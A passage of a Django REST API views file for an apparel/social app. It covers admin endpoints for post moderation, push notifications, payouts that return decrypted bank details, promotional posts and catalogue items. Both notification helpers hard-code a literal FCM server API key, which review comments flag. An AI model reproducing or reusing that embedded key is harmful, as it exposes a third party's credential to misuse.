                p=ReportPost.objects.filter(post_id=post_id).update(status=0)
                print(p)
                if post1:
                    # Keep the owner's denormalized post_count in sync.
                    post_count = user1.post_count
                    User.objects.filter(id = post.user_id).update(post_count = post_count-1)
                    favpost = Favourite.objects.filter(post_id=post_id)
                    if favpost:
                        Favourite.objects.filter(post_id=post_id).update(status=0)
                    notify = SenddisableNotification(post.user_id,"post disabled","Admin disabled your post","post disabled",post.id)
                    return Response({"message" : deletePostSuccessMessage, "status" : "1"}, status=status.HTTP_200_OK)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
import requests
########################################################################################################
# send disable notification
########################################################################################################
def SenddisableNotification(receiverId,title,message,tag,post_id):
    """Push a "post disabled" FCM data notification to one user's device.

    Args:
        receiverId: id of the User whose deviceId receives the push.
        title/message/tag/post_id: notification payload fields, forwarded
            both as the displayed title/body and inside data_message.

    Returns False on any failure; None on success (callers ignore the result).
    """
    try:
        # SECURITY: hard-coded FCM server key committed to source control --
        # move this credential into settings/environment configuration.
        push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
        receiver = User.objects.get(id=receiverId)
        # Single-recipient list; kept as a list for notify_multiple_devices.
        device_ids = [receiver.deviceId]
        if device_ids:
            data_message = {
                "message_title": title,
                "message_body": message,
                "tag": tag,
                "post_id": post_id,
            }
            result = push_service.notify_multiple_devices(
                registration_ids=device_ids,
                message_title=title,
                sound="default",
                message_body=message,
                data_message=data_message,
            )
            print(result,"1111111111111111")
    except Exception as e:
        # Best-effort push: never let a notification failure break the caller.
        return False
#####################################################################################
# enable post by admin
#####################################################################################
@api_view(['POST'])
def enablePostByAdmin(request):
    """Admin-only endpoint: re-enable a disabled post (inverse of DisablePostByAdmin).

    JSON body: 'post_id' -- the id of a post with post_status=0.
    Side effects: sets the post's post_status to 1, flips its ReportPost rows to
    status=1, increments the owner's post_count, re-enables Favourite rows for
    the post, and pushes a "post enabled" notification to the owner.

    Auth: HTTP_AUTHORIZATION must hold a token whose user is in the 'Admin' group.
    Returns 200 on success, 401 on auth failure, 500 otherwise.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body, strict=False)
            # --- authorization: resolve token -> user, require 'Admin' group ---
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='Admin').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            post_id = received_json_data['post_id']
            # Raises DoesNotExist (-> 500 below) if the post is absent/enabled.
            post = Post.objects.get(id=post_id,post_status =0)
            print(post.user_id)
            user1 = User.objects.get(id =post.user_id)
            if post:
                post1 = Post.objects.filter(id = post.id,user_id=post.user_id).update(post_status=1)
                p=ReportPost.objects.filter(post_id=post_id).update(status=1)
                print(p)
                if post1:
                    # Keep the owner's denormalized post_count in sync.
                    post_count = user1.post_count
                    User.objects.filter(id = post.user_id).update(post_count = post_count+1)
                    favpost = Favourite.objects.filter(post_id=post_id)
                    if favpost:
                        Favourite.objects.filter(post_id=post_id).update(status=1)
                    # NOTE(review): "enableded" is a typo in the user-visible
                    # message and the tag; clients may match on the tag string,
                    # so it is left untouched here -- fix in coordination with
                    # the apps.
                    notify = SendenableNotification(post.user_id,"post enabled","Admin enableded your post","post enableded",post.id)
                    # NOTE(review): reuses deletePostSuccessMessage for an enable
                    # action -- confirm the constant's wording fits.
                    return Response({"message" : deletePostSuccessMessage, "status" : "1"}, status=status.HTTP_200_OK)
                else:
                    return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
import requests  # NOTE(review): stray mid-file import; appears unused in this section -- consider moving to the top-of-file import block
########################################################################################################
# send enable notification
########################################################################################################
def SendenableNotification(receiverId, title, message, tag, post_id):
    """Push an FCM "post enabled" notification to one user's device.

    Args:
        receiverId: id of the User to notify.
        title: notification title (also echoed in the data payload).
        message: notification body text.
        tag: client-side routing tag included in the data payload.
        post_id: id of the post the notification refers to.

    Returns:
        True when the push request was issued, False on any error.
        Errors are swallowed deliberately: a failed push must never break
        the calling API view.  (Previously the function returned None on
        success and False on failure; it now returns an explicit bool.)
    """
    try:
        # SECURITY(review): hard-coded FCM server key -- should live in
        # settings or an environment variable, not in source control.
        push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
        receiver = User.objects.get(id=receiverId)
        registration_ids_ios = [receiver.deviceId]
        message_body = message
        if len(registration_ids_ios) > 0:
            data_message = {
                "message_title": title,
                "message_body": message,
                "tag": tag,
                "post_id": post_id,
            }
            push_service.notify_multiple_devices(registration_ids=registration_ids_ios, message_title=title, sound="default", message_body=message_body, data_message=data_message)
        return True
    except Exception:
        return False
#####################################################################################
# get users payable by admin
#####################################################################################
@api_view(['GET'])
def GetUsersForPayment(request):
    """List pending due payments for the admin payout screen.

    Admin-only (token in Authorization header).  Returns DuePayment rows
    with payment_status=1 (pending), newest first, each enriched with the
    payee's decrypted bank details and full user record.
    """
    try:
        with transaction.atomic():
            # Authenticate the caller and require membership of the Admin group.
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='Admin').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            # payment_status=1 appears to mean "pending payout" here (cleared
            # rows are set to 0 by clear_due_payment) -- confirm with model docs.
            paymentss = DuePayment.objects.filter(payment_status =1).order_by('-created_time')
            # Any failure while enriching the rows (missing bank detail fields,
            # decryption errors, ...) falls through to the empty-list response.
            try:
                paymentserializer = DuePaymentSerializer(paymentss,many=True)
                pay = paymentserializer.data
                # Attach the payee's bank details, decrypting each Fernet-encrypted
                # field in place.  NOTE(review): cipher_suite.decrypt returns bytes,
                # so these fields are emitted as bytes in the JSON response --
                # presumably the client/renderer tolerates that; verify.
                for index,data in enumerate(pay):
                    user_bank = BankDetail.objects.filter(user_id=data['user'])
                    if user_bank:
                        bnk_serial = BankDetailSerializer(user_bank,many=True)
                        pay[index]['bank_detail'] = bnk_serial.data[0]
                        pay[index]['bank_detail']['Account_name'] = bytes(pay[index]['bank_detail']['Account_name'],'utf-8')
                        pay[index]['bank_detail']['Account_name'] = cipher_suite.decrypt(pay[index]['bank_detail']['Account_name'])
                        pay[index]['bank_detail']['Type'] = bytes(pay[index]['bank_detail']['Type'],'utf-8')
                        pay[index]['bank_detail']['Type'] = cipher_suite.decrypt(pay[index]['bank_detail']['Type'])
                        pay[index]['bank_detail']['routing_number'] = bytes(pay[index]['bank_detail']['routing_number'],'utf-8')
                        pay[index]['bank_detail']['routing_number'] = cipher_suite.decrypt(pay[index]['bank_detail']['routing_number'])
                        pay[index]['bank_detail']['acc_number'] = bytes(pay[index]['bank_detail']['acc_number'],'utf-8')
                        pay[index]['bank_detail']['acc_number'] = cipher_suite.decrypt(pay[index]['bank_detail']['acc_number'])
                # Replace the bare user id with the full serialized user record.
                for index,data in enumerate(pay):
                    pay_user = User.objects.filter(id=data['user'])
                    if pay_user:
                        pay_serializer_u = UserSerializer(pay_user,many=True)
                        pay[index]['user'] = pay_serializer_u.data[0]
                return Response({"message" : "Response Send Succesfully","status" : "1","response":pay}, status=status.HTTP_200_OK)
            except:
                return Response({"message" : "Response Send Succesfully","status" : "1","response":[]}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#####################################################################################
# get history of payment
#####################################################################################
@api_view(['GET'])
def PaymentHistory(request):
    """List already-cleared due payments (payout history) for the admin.

    Admin-only (token in Authorization header).  Mirrors GetUsersForPayment
    but returns rows with payment_status=0 (cleared), ordered by most recent
    transaction_time, enriched with decrypted bank details and user records.
    """
    try:
        with transaction.atomic():
            # Authenticate the caller and require membership of the Admin group.
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='Admin').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            # payment_status=0 marks payments already cleared by clear_due_payment.
            paymentss = DuePayment.objects.filter(payment_status =0).order_by('-transaction_time')
            # Any failure while enriching the rows falls through to the
            # empty-list response below.
            try:
                paymentserializer = DuePaymentSerializer(paymentss,many=True)
                pay = paymentserializer.data
                print(pay)
                # Attach the payee's bank details, decrypting each encrypted
                # field in place.  NOTE(review): cipher_suite.decrypt returns
                # bytes, which end up in the JSON payload -- verify the client
                # handles that, same as in GetUsersForPayment.
                for index,data in enumerate(pay):
                    user_bank = BankDetail.objects.filter(user_id=data['user'])
                    if user_bank:
                        bnk_serial = BankDetailSerializer(user_bank,many=True)
                        pay[index]['bank_detail'] = bnk_serial.data[0]
                        pay[index]['bank_detail']['Account_name'] = bytes(pay[index]['bank_detail']['Account_name'],'utf-8')
                        pay[index]['bank_detail']['Account_name'] = cipher_suite.decrypt(pay[index]['bank_detail']['Account_name'])
                        pay[index]['bank_detail']['Type'] = bytes(pay[index]['bank_detail']['Type'],'utf-8')
                        pay[index]['bank_detail']['Type'] = cipher_suite.decrypt(pay[index]['bank_detail']['Type'])
                        pay[index]['bank_detail']['routing_number'] = bytes(pay[index]['bank_detail']['routing_number'],'utf-8')
                        pay[index]['bank_detail']['routing_number'] = cipher_suite.decrypt(pay[index]['bank_detail']['routing_number'])
                        pay[index]['bank_detail']['acc_number'] = bytes(pay[index]['bank_detail']['acc_number'],'utf-8')
                        pay[index]['bank_detail']['acc_number'] = cipher_suite.decrypt(pay[index]['bank_detail']['acc_number'])
                # Replace the bare user id with the full serialized user record.
                for index,data in enumerate(pay):
                    pay_user = User.objects.filter(id=data['user'])
                    if pay_user:
                        pay_serializer_u = UserSerializer(pay_user,many=True)
                        pay[index]['user'] = pay_serializer_u.data[0]
                return Response({"message" : "Response Send Succesfully","status" : "1","response":pay}, status=status.HTTP_200_OK)
            except:
                return Response({"message" : "Response Send Succesfully","status" : "1","response":[]}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################################################################
# Add promotional post by
############################################################################################################
@api_view(['POST'])
def add_promotonal_post(request):
    """Create a promotional post (admin only).

    The post is created already enabled (post_status=1), tagged with
    post_type "promotional", owned by the admin and stamped with a
    timezone-aware UTC creation time.  Returns the new post's id.
    """
    try:
        with transaction.atomic():
            # Only members of the Admin group may create promotional posts.
            try:
                token = Token.objects.get(key=request.META.get('HTTP_AUTHORIZATION'))
                admin_user = token.user
                if not admin_user.groups.filter(name='Admin').exists():
                    return Response({"message": errorMessageUnauthorised, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            created_at = datetime.datetime.utcnow().replace(tzinfo=utc)
            new_post = Post.objects.create(
                post_description=request.data['post_description'],
                user_id=admin_user.id,
                created_time=created_at,
                post_status=1,
                post_type="promotional",
            )
            if new_post is not None:
                return Response({"message": addPostSuccessMessage, "status": "1", "post": PostSerializer(new_post).data['id']}, status=status.HTTP_200_OK)
            return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################################################################
# Delete promotional post by admin
############################################################################################################
@api_view(['POST'])
def delete_promotonal_post(request):
    """Soft-delete a promotional post (admin only).

    Expects {"id": <post id>}.  Sets the post's status to 0, deactivates
    favourites that point at it and removes its PostImage rows.
    """
    try:
        with transaction.atomic():
            # Only members of the Admin group may delete promotional posts.
            try:
                token = Token.objects.get(key=request.META.get('HTTP_AUTHORIZATION'))
                if not token.user.groups.filter(name='Admin').exists():
                    return Response({"message": errorMessageUnauthorised, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            target_id = request.data['id']
            if Post.objects.filter(id=target_id, post_status=1).exists():
                updated = Post.objects.filter(id=target_id).update(post_status=0)
                # Deactivate favourites referencing the deleted post.
                if Favourite.objects.filter(post_id=target_id):
                    Favourite.objects.filter(post_id=target_id).update(status=0)
                if updated:
                    PostImage.objects.filter(post_id=target_id).delete()
                    return Response({"message": deleteSuccessMessage, "status": "1"}, status=status.HTTP_201_CREATED)
            else:
                return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
###############################################################################################################################
# get promotionalpost history
###############################################################################################################################
@api_view(['GET'])
def Get_promo_History(request):
    """List active promotional posts for the admin dashboard.

    Admin-only (token in Authorization header).  Returns enabled
    (post_status=1) promotional posts with truncated description/date
    and the first attached image, or an empty list on any failure.
    """
    try:
        with transaction.atomic():
            # Authenticate the caller and require membership of the Admin group.
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='Admin').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            try:
                promo_posts = Post.objects.filter(post_type="promotional",post_status=1)
                if promo_posts:
                    promo_serializer = PostSerializer(promo_posts,many=True)
                    promo = promo_serializer.data
                    # Trim list-view fields: first 30 chars of the description,
                    # date portion (YYYY-MM-DD) of the ISO timestamp.
                    for i1 in promo:
                        i1['post_description'] = i1['post_description'][:30]
                        i1['created_time'] = i1['created_time'][:10]
                    # Attach the first image of each post, when one exists.
                    for index, data in enumerate(promo):
                        print(data['id'])
                        promo_image = PostImage.objects.filter(post_id=data['id'])
                        if promo_image:
                            promo_serial = PostImageSerializer(promo_image, many=True)
                            promo[index]['image'] = promo_serial.data[0]
                # NOTE(review): when there are no promotional posts, `promo` is
                # unbound here and this line raises NameError, which the except
                # below converts into the empty-list response -- fragile but
                # functional; confirm before restructuring.
                return Response({"message" : "Response Send Succesfully","status" : "1","response":promo}, status=status.HTTP_200_OK)
            except:
                return Response({"message" : "Response Send Succesfully","status" : "1","response":[]}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################################################################
# Clear Due Payment by admin
############################################################################################################
@api_view(['POST'])
def clear_due_payment(request):
    """Mark a pending due payment as paid (admin only).

    Expects {"id": <DuePayment id>}.  Flips payment_status 1 -> 0 and
    records the clearing time in transaction_time.

    Fix: the timestamp is now a timezone-aware UTC datetime (matching how
    created_time is set elsewhere in this file); the previous naive
    datetime.datetime.now() recorded server-local time and mixed naive and
    aware datetimes in the same table.
    """
    try:
        with transaction.atomic():
            # Only members of the Admin group may clear payments.
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='Admin').exists()
                if not checkGroup:
                    return Response({"message": errorMessageUnauthorised, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            dueId = request.data['id']
            nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
            # Only payments that are still pending (payment_status=1) can be cleared.
            del_due = DuePayment.objects.filter(id=dueId, payment_status=1).exists()
            if del_due:
                DuePayment.objects.filter(id=dueId).update(payment_status=0, transaction_time=nowTime)
                return Response({"message": deleteSuccessMessage, "status": "1"}, status=status.HTTP_201_CREATED)
            else:
                return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
####################################################################
# apis to add custom data for custom module
###################################################################
#======================================
# api for add pattern
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Add_Patterns(request):
    """Create a Pattern record (admin only).

    PUT multipart form: 'pattern' (name), 'price', optional 'image' file.
    An uploaded image is stored under patternimages/<admin id>/.

    Bug fix: the original referenced `uploaded_file_url` even when no image
    was uploaded, raising NameError (surfacing as a 500).  The pattern is now
    created with an empty image path in that case, which is what the
    pre-initialised `imageUrl = ""` clearly intended.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token = Token.objects.get(key=API_key)
                    user = token.user
                    checkGroup = user.groups.filter(name='Admin').exists()
                except Exception:
                    return Response({"message": "Session Expired!! Please Login Again", "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    pattern = request.data['pattern']
                    price = request.data['price']
                    file = request.FILES.get('image')
                    imageUrl = ""
                    if file is not None:
                        fs = FileSystemStorage()
                        filename = fs.save("patternimages/" + str(user.id) + "/" + file.name, file)
                        imageUrl = fs.url(filename)
                    Pattern.objects.create(pattern=pattern,
                                           image=imageUrl,
                                           status=1,
                                           price=price)
                    return Response({'message': addSuccessMessage, "status": "1"}, status=status.HTTP_200_OK)
                else:
                    return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                # NOTE(review): misleading message -- this branch means the
                # Authorization header is missing, not the timezone.
                return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": str(e), "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# api for add shapes
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Add_Shapes(request):
    """Create a Shape record (admin only).

    PUT multipart form: 'shape' (name), 'price', optional 'image' file.
    An uploaded image is stored under shapesimages/<admin id>/.

    Bug fix: `uploaded_file_url` was referenced even when no image was
    uploaded, raising NameError (500).  The shape is now created with an
    empty image path in that case, per the pre-initialised `imageUrl = ""`.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token = Token.objects.get(key=API_key)
                    user = token.user
                    checkGroup = user.groups.filter(name='Admin').exists()
                except Exception:
                    return Response({"message": "Session Expired!! Please Login Again", "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    shape = request.data['shape']
                    price = request.data['price']
                    file = request.FILES.get('image')
                    imageUrl = ""
                    if file is not None:
                        fs = FileSystemStorage()
                        filename = fs.save("shapesimages/" + str(user.id) + "/" + file.name, file)
                        imageUrl = fs.url(filename)
                    Shape.objects.create(shape=shape,
                                         image=imageUrl,
                                         status=1,
                                         price=price)
                    return Response({'message': addSuccessMessage, "status": "1"}, status=status.HTTP_200_OK)
                else:
                    return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                # NOTE(review): misleading message -- this branch means the
                # Authorization header is missing, not the timezone.
                return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": str(e), "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# api for add cloth style
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Add_Cloth_Style(request):
    """Create a ClothStyle record (admin only).

    PUT body: 'style_name' and 'price'.  The style is created active
    (status=1).  Requires an admin token in the Authorization header.
    """
    try:
        with transaction.atomic():
            auth_key = request.META.get('HTTP_AUTHORIZATION')
            if auth_key is None:
                return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            # Resolve the token to a user and check Admin group membership.
            try:
                admin = Token.objects.get(key=auth_key).user
                is_admin = admin.groups.filter(name='Admin').exists()
            except Exception:
                return Response({"message": "Session Expired!! Please Login Again", "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            if not is_admin:
                return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            ClothStyle.objects.create(style_name=request.data['style_name'],
                                      status=1,
                                      price=request.data['price'])
            return Response({'message': addSuccessMessage, "status": "1"}, status=status.HTTP_200_OK)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": str(e), "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# api for add cloth style colour
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Add_Cloth_Style_colour(request):
    """Create a ClothStyleColour record (admin only).

    PUT multipart form: 'colour', 'colour_code', 'cloth_style' (style id),
    optional 'image' file stored under clothstylecolourimages/<admin id>/
    and saved as the colour's front_image.

    Bug fix: `uploaded_file_url` was referenced even when no image was
    uploaded, raising NameError (500).  The record is now created with an
    empty front_image in that case, per the pre-initialised `imageUrl = ""`.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token = Token.objects.get(key=API_key)
                    user = token.user
                    checkGroup = user.groups.filter(name='Admin').exists()
                except Exception:
                    return Response({"message": "Session Expired!! Please Login Again", "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    colour = request.data['colour']
                    colour_code = request.data['colour_code']
                    cloth_style = request.data['cloth_style']
                    file = request.FILES.get('image')
                    imageUrl = ""
                    if file is not None:
                        fs = FileSystemStorage()
                        filename = fs.save("clothstylecolourimages/" + str(user.id) + "/" + file.name, file)
                        imageUrl = fs.url(filename)
                    ClothStyleColour.objects.create(colour=colour,
                                                    colour_code=colour_code,
                                                    status=1,
                                                    cloth_style_id=cloth_style,
                                                    front_image=imageUrl)
                    return Response({'message': addSuccessMessage, "status": "1"}, status=status.HTTP_200_OK)
                else:
                    return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                # NOTE(review): misleading message -- this branch means the
                # Authorization header is missing, not the timezone.
                return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": str(e), "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=============================================
# api for add cloth style colour Images
#=============================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Add_Cloth_Style_colour_Images(request):
    """Attach an extra image to a ClothStyleColour (admin only).

    PUT multipart form: 'colour' (ClothStyleColour id) and optional 'image'
    file stored under clothstylecolourimages/<admin id>/.

    Bug fix: `uploaded_file_url` was referenced even when no image was
    uploaded, raising NameError (500).  The record is now created with an
    empty image path in that case, per the pre-initialised `imageUrl = ""`.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token = Token.objects.get(key=API_key)
                    user = token.user
                    checkGroup = user.groups.filter(name='Admin').exists()
                except Exception:
                    return Response({"message": "Session Expired!! Please Login Again", "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    colour = request.data['colour']
                    file = request.FILES.get('image')
                    imageUrl = ""
                    if file is not None:
                        fs = FileSystemStorage()
                        filename = fs.save("clothstylecolourimages/" + str(user.id) + "/" + file.name, file)
                        imageUrl = fs.url(filename)
                    ClothStyleColourImage.objects.create(colour_id=colour,
                                                         status=1,
                                                         image=imageUrl)
                    return Response({'message': addSuccessMessage, "status": "1"}, status=status.HTTP_200_OK)
                else:
                    return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                # NOTE(review): misleading message -- this branch means the
                # Authorization header is missing, not the timezone.
                return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": str(e), "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# api for shape colour
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Shape_Colour(request):
    """Create a ShapeColour record (admin only).

    PUT multipart form: 'colour' and optional 'image' file stored under
    shapecolourimages/<admin id>/.

    Bug fix: `uploaded_file_url` was referenced even when no image was
    uploaded, raising NameError (500).  The record is now created with an
    empty image path in that case, per the pre-initialised `imageUrl = ""`.
    """
    try:
        with transaction.atomic():
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token = Token.objects.get(key=API_key)
                    user = token.user
                    checkGroup = user.groups.filter(name='Admin').exists()
                except Exception:
                    return Response({"message": "Session Expired!! Please Login Again", "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    colour = request.data['colour']
                    file = request.FILES.get('image')
                    imageUrl = ""
                    if file is not None:
                        fs = FileSystemStorage()
                        filename = fs.save("shapecolourimages/" + str(user.id) + "/" + file.name, file)
                        imageUrl = fs.url(filename)
                    ShapeColour.objects.create(colour=colour,
                                               image=imageUrl)
                    return Response({'message': addSuccessMessage, "status": "1"}, status=status.HTTP_200_OK)
                else:
                    return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                # NOTE(review): misleading message -- this branch means the
                # Authorization header is missing, not the timezone.
                return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": str(e), "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# api for sew
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Seww(request):
    """Create a Sew record (admin only).

    PUT body: 'sew_name'.  Requires an admin token in the
    Authorization header.
    """
    try:
        with transaction.atomic():
            auth_key = request.META.get('HTTP_AUTHORIZATION')
            if auth_key is None:
                return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            # Resolve the token to a user and check Admin group membership.
            try:
                admin = Token.objects.get(key=auth_key).user
                is_admin = admin.groups.filter(name='Admin').exists()
            except Exception:
                return Response({"message": "Session Expired!! Please Login Again", "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
            if not is_admin:
                return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            Sew.objects.create(sew_name=request.data['sew_name'])
            return Response({'message': addSuccessMessage, "status": "1"}, status=status.HTTP_200_OK)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": str(e), "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#######################################################
# api to add pattern colour images t-shirts
#######################################################
@api_view(['POST'])
def Add_Pattern_Colour_Tshirt(request):
    """Attach a pattern-colour image to a cloth style / t-shirt (admin only).

    POST multipart form: 'colour', 'cloth_style', 'pattern' (ids) and
    optional 'image' file stored under patterncolourTshirtimages/<admin id>/.

    Bug fix: `uploaded_file_url` was referenced even when no image was
    uploaded, raising NameError (500).  The record is now created with an
    empty image path in that case, per the pre-initialised `imageUrl = ""`.
    """
    try:
        with transaction.atomic():
            API_Key = request.META.get('HTTP_AUTHORIZATION')
            if API_Key is not None:
                try:
                    token = Token.objects.get(key=API_Key)
                    user = token.user
                    checkGroup = user.groups.filter(name='Admin').exists()
                except Exception:
                    return Response({"message": "Session Expired!! Please Login Again", "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
                if checkGroup:
                    file = request.FILES.get('image')
                    imageUrl = ""
                    if file is not None:
                        fs = FileSystemStorage()
                        filename = fs.save("patterncolourTshirtimages/" + str(user.id) + "/" + file.name, file)
                        imageUrl = fs.url(filename)
                    ClothStylePatternColourImage.objects.create(colour_id=request.data['colour'],
